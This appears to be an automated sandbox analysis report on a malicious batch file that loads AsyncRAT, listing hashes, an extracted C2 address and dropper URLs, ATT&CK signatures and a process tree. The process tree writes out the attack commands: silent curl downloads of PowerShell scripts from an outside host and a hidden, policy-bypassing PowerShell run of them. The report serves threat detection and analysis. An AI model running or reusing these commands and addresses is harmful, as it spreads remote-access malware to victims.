Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64
    arch:x86
    image:win10v2004-20240802-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    13-08-2024 01:07

General

  • Target

    21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d.bat

  • Size

    1KB

  • MD5

    0850bed86b58f6cc688a9bdc572cbb09

  • SHA1

    4231a90ab16aa0486d28a07797977154c0407db6

  • SHA256

    21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d

  • SHA512

    75c7cc7977e4e641b02c7dea16dd4b0d11d1b867401cd11900d38b62698d3614125576d6ba1156d8e4843b19d081ce7399f9aa6e3539bf7f2692727d43d1578d

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs
    ps1.dropper
    https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/ba8ee9ec-b88f-4790-9a20-15398c1906da/e12f0f2d-542f-4d56-ab33-6696336c0e9c?temp_url_sig=f59339ce78a96139157b21132687d93c516b7e0dff5892c1129220cdce51dcb2&temp_url_expires=1722978000811&filename=AE.exe
    exe.dropper
    https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/719ce3c5-8399-415d-82c3-ba4c5ebae040/451e981f-3416-484b-ba8a-6c3aae1417f9?temp_url_sig=556153ec968ac29ad231ea6c322f68ca67bb5cdcaac01d58e5fbd2c716a5edd8&temp_url_expires=1722977955443&filename=Client.exe

Extracted

  • Family
    asyncrat
  • Version
    1.0.7
  • Botnet
    Default
  • C2
    185.169.54.165:7331
  • Mutex
    DcRatMutex_qwqdanchun
  • Attributes
    delay
    1
    install
    false
    install_folder
    %AppData%
  • aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Downloads MZ/PE file
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\system32\curl.exe
      curl --silent -o "C:\Users\Admin\Downloads\yenisc.ps1" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/b496ff8d-f746-436f-9f51-f0f5e9a54c72/c9964749-ce1b-4755-bdf4-1baeace3f824?temp_url_sig=309db29aa8525a320e6e31b7be5c56c9ddfc1ce17173e0f6ce668675f2e8239f&temp_url_expires=1722978047256&filename=gBCncelbypass.ps1"
      2⤵
      PID:2228
    • C:\Windows\system32\curl.exe
      curl --silent -o "C:\Users\Admin\Downloads\yenisc2.ps1" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/b496ff8d-f746-436f-9f51-f0f5e9a54c72/80eb5218-4192-45e1-9974-d46407fc1475?temp_url_sig=d9d4b8fce07cbf5e93d6e2ce6a634b2e74f0697b1a7fc4ff90f5016fbe6e090e&temp_url_expires=1722978046557&filename=stub.ps1"
      2⤵
      PID:3944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "& 'C:\Users\Admin\Downloads\yenisc.ps1'; & 'C:\Users\Admin\Downloads\yenisc2.ps1'; Start-Sleep -Seconds 6; & 'C:\Users\Admin\Downloads\yenisc.ps1'; & 'C:\Users\Admin\Downloads\yenisc2.ps1'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:700
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB824.tmp" "c:\Users\Admin\AppData\Local\Temp\wn1gewpy\CSC7149A958CDF8479EA954F652EAD7A93B.TMP"
          4⤵
          PID:1296
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4664
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        PID:4212
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4660

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESB824.tmp
    Filesize
    1KB
    MD5
    7b0d9cf75cb72ac5bfde0651db7f07f1
    SHA1
    0d9dca2f8e37c6974010de78693e5d0d6bf9be7b
    SHA256
    4dccfa22d79174feeee58dff68d4af1602da5916b95659cb30270fad8aa46ff1
    SHA512
    7ce140a28b4f0bc31518c258180771a58d875a04f9a4ef0880f42fdb9dc9ca3d929803baa7526c3a67db1c68dbdc13f279d52c5a996b239ec4b58662f78189a0
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eixxqisj.ket.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.dll
    Filesize
    8KB
    MD5
    066549bd71370624602aaff96417a8e3
    SHA1
    62291ab112f18108652935d516dfca17f8b9f942
    SHA256
    09d3e9fb3203929be08ebedeca627261a0b170d3676b7f59763c80163f3d7a6a
    SHA512
    ac1bd6f885e93f847720cf02a52188d8aae63fcd7c3889b2129c3913dd6555c0e4eeee834533598718b7f871925372b194e7dfc397cb06c78a7397e7ef0458a6
  • C:\Users\Admin\Downloads\yenisc.ps1
    Filesize
    11KB
    MD5
    1aeb09dfea797e31fb06087d48e87cc8
    SHA1
    ffc83b868ea7e57c86053c823c3a0c17b7f81479
    SHA256
    77842b05bf2ff23d3cb8ebb019f7d40310280c65816f78f655b011162a67dd85
    SHA512
    4181c8d4ce6e5fd9f433d42318fce462e376662ed792281b4b8bcfada7a3d6dc000afbc26e7b3450fb36d3e8c4d0707192e42451c37a9854ad8ffa32a37c3cd7
  • C:\Users\Admin\Downloads\yenisc2.ps1
    Filesize
    2KB
    MD5
    b4ce78d3ce06757ceac96f41e3d063b6
    SHA1
    8be4093f5effe6df2734b5db044fec34bddaa2fb
    SHA256
    344c7da93f656041139c2025a960539db8916f2ab80dc780ef6eefab359fed04
    SHA512
    6933c30575451de6b36d38befe85a4e5fb6612073a1a16605f43b6a9bcad6e1a5cabd113a59950e3bf93c427edef1c7139cec2665ad9cecb9fe660b5a8b5c757
  • \??\c:\Users\Admin\AppData\Local\Temp\wn1gewpy\CSC7149A958CDF8479EA954F652EAD7A93B.TMP
    Filesize
    652B
    MD5
    fd15820bb68382424e3d446f5fb03b4a
    SHA1
    7c7dca922b6c02c8a766852a1bfa0cb68d6001de
    SHA256
    063b5a27447cb98044c359c6b2efbe5a57bff2eadb3b8bef4dfa1184c26b9dd9
    SHA512
    3e1ca0aba3b83c2ccf3e4b1784a98fc9ae10cff13e5a597d8fcdc69f4a49d09764dc24aafc7201c858ec8c34833b17659c4622225a3f8c4cf9b67a4d6a9c1f4b
  • \??\c:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.0.cs
    Filesize
    11KB
    MD5
    663338909086aed18110382d73ff9594
    SHA1
    25685ec0deef7d8170c98c65dbe937ed9181115f
    SHA256
    4ad28ba4ff78fce289b3dc6fbba82f8a98302725f3a75531a7647c2548cec447
    SHA512
    9d861659219c9b162d2669417236e103b4dccb1f1ed48d8415f00b3fdcc972617ab775154cab1061b58148485fa8ba98c2d0a1b79e1bcf88c0f0e2554af3a1f3
  • \??\c:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.cmdline
    Filesize
    369B
    MD5
    6db9233a5c30d5eeb8f6d26316411afd
    SHA1
    db768d27f25ddba2994027581a9ddfd856f7dd8b
    SHA256
    dbfe0137c72b4a6062ed3e27cc59ae0a09f184e5136081fae81abb9bb819caf9
    SHA512
    e313a0a3b631b1c7037608c61109cd24b0066d5946780cd6063c10d8e0141d71923eb5cb3d29ae64716e30e6d23c5997f15f45b96a9644df09012c8b59117193
  • memory/700-15-0x00007FFCF9420000-0x00007FFCF9EE1000-memory.dmp
    Filesize
    10.8MB
  • memory/700-2-0x00007FFCF9423000-0x00007FFCF9425000-memory.dmp
    Filesize
    8KB
  • memory/700-13-0x00007FFCF9420000-0x00007FFCF9EE1000-memory.dmp
    Filesize
    10.8MB
  • memory/700-28-0x000001CCAAF10000-0x000001CCAAF18000-memory.dmp
    Filesize
    32KB
  • memory/700-8-0x000001CCAB380000-0x000001CCAB3A2000-memory.dmp
    Filesize
    136KB
  • memory/700-31-0x000001CCC5930000-0x000001CCC5970000-memory.dmp
    Filesize
    256KB
  • memory/700-32-0x000001CCAB3D0000-0x000001CCAB3D6000-memory.dmp
    Filesize
    24KB
  • memory/700-42-0x00007FFCF9420000-0x00007FFCF9EE1000-memory.dmp
    Filesize
    10.8MB
  • memory/4664-33-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize
    72KB
  • memory/4664-36-0x0000000005EA0000-0x0000000005F3C000-memory.dmp
    Filesize
    624KB
  • memory/4664-37-0x00000000064F0000-0x0000000006A94000-memory.dmp
    Filesize
    5.6MB
  • memory/4664-38-0x0000000005FB0000-0x0000000006016000-memory.dmp
    Filesize
    408KB